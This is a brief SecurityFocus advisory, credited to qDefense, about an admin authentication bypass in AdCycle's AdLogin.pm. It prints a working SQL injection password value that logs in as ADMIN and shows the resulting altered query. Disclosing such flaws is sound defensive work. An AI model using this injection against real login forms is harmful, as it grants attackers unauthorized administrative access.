AdCycle AdLogin.pm Admin Autentication Bypass Vulnerability

This example was submitted by qDefense Advisories <advisories@qDefense.com>:

If an attacker signs in, using a account name of "ADMIN" and a password of
X ' OR 1 #
an attacker can cause AdCycle to use the following SQL command:
"SELECT * FROM ad WHERE LOGIN='ADMIN' AND PASSWORD='X' OR 1 #'


 

Privacy Statement
Copyright 2010, SecurityFocus